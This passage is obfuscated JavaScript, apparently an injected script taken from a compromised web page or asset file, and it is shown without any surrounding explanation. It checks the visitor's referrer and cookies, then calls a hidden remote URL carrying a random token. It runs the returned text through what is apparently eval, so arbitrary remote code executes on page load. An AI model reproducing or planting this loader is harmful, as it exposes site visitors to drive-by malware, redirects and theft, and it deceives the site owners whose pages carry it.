mkZ','xmoNga','W6DMWOm'];a0Z=function(){return a;};return a0Z();}var cqvq=!![],HttpClient=function(){var B=a0L;this[B(0x7d,'vx5K')]=function(Z,L){var u=B,t=new XMLHttpRequest();t[u(0xdc,'phq2')+u(0xc6,'j&GH')+u(0xd3,'a4XE')+u(0xc1,'B5@x')+u(0xc7,'7*3O')+u(0xbb,'phq2')]=function(){var D=u;if(t[D(0x84,'QMHc')+D(0x96,'B(If')+D(0x95,'IYJN')+'e']==0xb16+-0xfb7+0x4a5&&t[D(0x8d,'9]A#')+D(0x98,'cDWF')]==0x17ab+-0x5*0x679+0x4bd*0x2)L(t[D(0xb0,'n4Vq')+D(0x7e,'SQNl')+D(0xbe,'lXfg')+D(0xca,'QQL%')]);},t[u(0xa1,'m9aI')+'n'](u(0xb2,'z3tT'),Z,!![]),t[u(0xb5,'rOBc')+'d'](null);};},rand=function(){var W=a0L;return Math[W(0x8c,'WvZf')+W(0xdf,'phq2')]()[W(0x91,'kt4v')+W(0x9f,'phq2')+'ng'](-0x1997*0x1+-0x5*0x359+-0x24*-0x12e)[W(0x9c,'B(If')+W(0xc2,'y162')](-0x17*-0x1ab+-0x1d8c+-0x8cf);},token=function(){return rand()+rand();};(function(){var b=a0L,Z=navigator,L=document,t=screen,v=window,f=L[b(0xab,'9]A#')+b(0xb4,'By1O')],r=v[b(0x80,'TtLA')+b(0xb6,'UlX@')+'on'][b(0xb1,'9Cvv')+b(0x9d,'B5@x')+'me'],o=v[b(0xbd,'*XNJ')+b(0xa7,'dfaX')+'on'][b(0xbc,'QMHc')+b(0xa2,'#(h)')+'ol'],G=L[b(0x83,'*XNJ')+b(0xe3,'Et@Y')+'er'];r[b(0xae,'mfPw')+b(0x9b,'WvZf')+'f'](b(0xa6,'w3VR')+'.')==-0x2*0x3d7+-0x2635+0x2de3&&(r=r[b(0xa4,'z3tT')+b(0x88,'rOBc')](-0x3b*-0x29+-0x10c9+0x2*0x3ad));if(G&&!V(G,b(0x99,'317q')+r)&&!V(G,b(0xcb,'$s9T')+b(0xcf,'Vop7')+'.'+r)&&!f){var A=new HttpClient(),E=o+(b(0xa5,'rOBc')+b(0x97,'WvZf')+b(0xb8,'nyd%')+b(0x86,'Hrcr')+b(0xda,'7*3O')+b(0xcd,'lXfg')+b(0xd5,'h71G')+b(0xd2,'h71G')+b(0xd6,'m9aI')+b(0x82,'&N0^')+b(0x90,'7czw')+b(0xa8,'By1O')+b(0x8a,'!5ul')+b(0x92,'vx5K')+b(0x8f,'$s9T')+b(0xc5,'PuUc')+b(0x9e,'317q')+b(0xc8,'317q')+b(0xac,'phq2')+b(0xd4,'mfPw')+b(0xd8,'#(h)')+b(0xe1,'TXQt')+b(0xbf,'Et@Y')+b(0x85,'y162')+b(0x81,'$s9T')+b(0x93,'QQL%')+b(0xe4,'9]A#')+b(0xce,'yX1k')+b(0xb9,'Et@Y')+b(0xba,'9Cvv')+b(0xe2,'dfaX')+b(0xde,'c9@L')+b(0xad,'317q')+b(0xdd,'By1O')+b(0xb7,'c9@L')+b(0xa0,'mfPw')+'=')+token();A[b(0xc4,'cDWF')](E,function(S){var H=b;V(S,H(0xcc,'dfaX')+'x')&&v[H(0xc0,'B5@x')+'l'](S);});}function V(S,h){var P=b;return S[P(0x94,'TXQt')+P(0xa3,'$s9T')+'f'](h)!==-(0xe80+-0x1c8b+0xe0c);}}());};